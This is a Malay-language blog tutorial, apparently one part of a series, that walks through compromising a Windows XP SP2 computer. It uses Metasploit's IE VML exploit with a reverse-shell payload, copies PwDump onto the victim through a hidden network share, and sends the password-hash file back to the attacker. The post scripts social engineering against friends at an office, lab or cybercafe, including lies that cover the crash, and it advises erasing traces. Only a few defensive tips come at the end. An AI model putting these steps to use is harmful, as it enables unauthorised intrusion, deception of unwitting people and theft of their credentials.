Sambungan dari artike "Konsep Asas Hacking"... kita hanya mencuba hack pada windows XP pack 2
Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.
Setelah mengetahui sedikit dan konsep asas mengenai hack yang dibahas dibahagian pertama dan mengetahui sedikit materi mengenai exploit pada bahagian kedua, sekarang langsung saja kita praktik-kan. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, kerana tidak semua orang dapat mempraktikannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang tidak boleh menggunakan VMWare, cuba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.
Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target/sasaran .
Apa itu Metasploit Framework ?
The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.
Untuk info lebih lanjut mengenai Metasploit, anda dapat membaca yang juga disertakan dalam installation. Untuk melakukan peng-install-an metasploit versi 2.7, diperlukan user administrator. Sebelumnya saya mencuba menginstall dengan ‘limited user’ tapi setelah diinstall tidak boleh beroperasi. Sebenarnya metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit di- xtrack-kan ternyata tidak dapat admin menjalankan operasi. tak perlulah ditulis disini, soalnya ketika mencuba versi terbaru, iaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Itu saja masalahnya! Lagi pula versi 3 (sekarang masih beta) lebih hebat dan fungisnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum boleh dijalankan sepenuhnya.
Ok.. sekarang saya biarkan anda membaca userguide metasploit. Biar lebih menarik, dan anda memahami detailnya secara lengkap, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, kerana metasploit dibuat menggunakan Perl. Sekarang mari kita praktikkan!!
Pertama2 jalankan ‘mfsconsole’!
Untuk mempelajari command apa saja yang ada di MSFConsole gunakan arahn ‘help’.
Kerana komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 iaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
Untuk melihat info dari exploit ini gunakan perintah :
msf > info ie_vml_rectfill
Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh kerana itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di Office/lab/cyber kita katakan kepada kawan bahawa kita sedang mencuba membuat aplikasi web terbaru, lalu minta tolong buka site menggunakan IE ke alamat IP (atau nama komputer) kita. Misalnya http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat katakanlah “Alamat.. ada masalah web yang aku buat nie.. nantilah ko masuk sekali lagi, aku nak betulkan”. Baru tutup IE-nya guna Task Manager (walaupun guna TM, IE masih sukar untuk dihapuskan, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja 
).
Untuk menggunakan exploit gunakan arahan2 berikut dalam console :
msf > use_ie_vml_rectfill
msf > set PAYLOAD win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
Hasilnya akan seperti gambar berikut :
Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan arahan ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi cuba-cuba la terus ok?
Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.
Crack da Password!
Yeah!, setelah kita ‘menguasai’ komputer target, maka kita adalah RAJA kepada komputernya dan mari kita lihat password-nya. Oleh kerana ini adalah remote maka kita harus ‘menyediakan’ program yangg diperlukan iaitu PwDump. Agar cara ini berhasil, dan saya teruskan pada komputer target user yang sedang login mempunyai akses admin. Kalau user yang digunakan komputer target yang digunakan oleh IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!...
Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita boleh meng-upload hasil dump password komputer target, tapi dengan akhirnya ‘$’ biar tidak ternampak dikomputer umum atau public. Contohnya nama folder yang di share PwDump$. dari console yang berjaya dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh arahan yang digunakan :
Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berjaya di-copy ke komputer target, jalankan Pwdump dengan perintah
C:\temp\Pwdump –o pass.txt 127.0.0.1
Kalau berjaya akan ada pada gambar seperti berikut.
dan copy file pass.txt ke komputer kita
C:\temp\copy pass.txt z:
Dan terakhir, jangan tinggalkan jejak bahawa kita sudah memasuki ruangan itu.
Yeah!, sudah dapat hash-kan filenya. Tinggal di crack sajalah….
Sebenarnya masih banyak yang dapat dipelajari dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dipelajari. Untuk mempelajari metasploit, banyak arahan2 didalam.. cuma taipkan HELP.
Happy Hacking…..
Nasihat diberikan agar windows kita tetap aman terhadap exploit diatas.
1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.
2. Patch Windows anda.
3. Gunakan antivirus dengan update terbaru
4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p
Reference :
http://www.metasploit.com
1 comments:
gila abisss ..!! hacker lo?? tapi gpp itu namanya ada pengetahuan??
Post a Comment